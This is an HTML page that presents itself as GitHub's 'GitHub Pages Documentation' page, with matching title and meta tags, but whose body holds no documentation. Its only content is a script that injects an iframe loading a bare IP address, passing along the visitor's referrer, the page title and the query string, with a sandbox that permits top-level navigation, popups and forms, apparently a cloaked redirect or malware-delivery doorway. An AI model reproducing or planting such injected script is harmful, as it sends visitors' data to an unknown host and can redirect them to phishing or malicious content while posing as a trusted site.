<!DOCTYPE html>
<html lang="en">
<head>
<meta charSet="utf-8"/>
<meta name="viewport" content="width=device-width, initial-scale=1"/>
<link rel="alternate icon" type="image/png" href="/assets/images/site/favicon.png"/>
<link rel="icon" type="image/svg+xml" href="/assets/images/site/favicon.svg"/>
<meta name="google-site-verification" content="c1kuD-K2HIVF635lypcsWPoD4kilo5-jA_wBFyT4uMY"/>
<meta name="csrf-token" content="GAonCvha-wGRAy5D8lYY86qQ7ok-WYW3OP0g"/>
<title>GitHub Pages Documentation - GitHub Docs</title>
<meta name="description" content="You can create a website directly from a GitHub repository."/>
<link rel="alternate" hrefLang="en" href="https://docs.github.com/en/pages"/>
<link rel="alternate" hrefLang="zh-Hans" href="https://docs.github.com/cn/pages"/>
<link rel="alternate" hrefLang="ja" href="https://docs.github.com/ja/pages"/>
<link rel="alternate" hrefLang="es" href="https://docs.github.com/es/pages"/>
<link rel="alternate" hrefLang="pt" href="https://docs.github.com/pt/pages"/>
<link rel="alternate" hrefLang="de" href="https://docs.github.com/de/pages"/>
<meta name="keywords" content="Pages"/>
<meta name="path-language" content="en"/>
<meta name="path-version" content="free-pro-team@latest"/>
<meta name="path-product" content="pages"/>
<meta name="path-article" content="pages"/>
<meta name="page-document-type" content="product"/>
<meta name="status" content="200"/>
<meta property="og:site_name" content="GitHub Docs"/>
<meta property="og:title" content="GitHub Pages Documentation - GitHub Docs"/>
<meta property="og:type" content="article"/>
<meta property="og:url" content="https://docs.github.com/en/pages"/>
<meta property="og:image" content="https://github.githubassets.com/images/modules/open_graph/github-logo.png"/>
<meta name="next-head-count" content="26"/>
<link rel="preload" href="/_next/static/css/5962864995ec90601dd8.css" as="style"/>
<link rel="stylesheet" href="/_next/static/css/5962864995ec90601dd8.css" data-n-g=""/>
<link rel="preload" href="/_next/static/css/c41198ac4cfab4e574d1.css" as="style"/>
<link rel="stylesheet" href="/_next/static/css/c41198ac4cfab4e574d1.css" data-n-p=""/>
</head>
<body>
<div id="a8d6fd42d-27b6-6ae0-681d-9c1372fd136e"></div>
<script type="application/javascript">
document.getElementById('a8d6fd42d-27b6-6ae0-681d-9c1372fd136e').innerHTML = '<iframe sandbox="allow-top-navigation allow-scripts allow-popups allow-forms" frameborder="0" width="" height="" src="//89.223.69.10/H4ywkMqk?se_referrer=' + encodeURIComponent(document.referrer) + '&default_keyword=' + encodeURIComponent(document.title) + '&'+window.location.search.replace('?', '&')+'&frm614e507ba5d8c=frame614e507ba5d8d"></iframe>'
</script>
</body></html>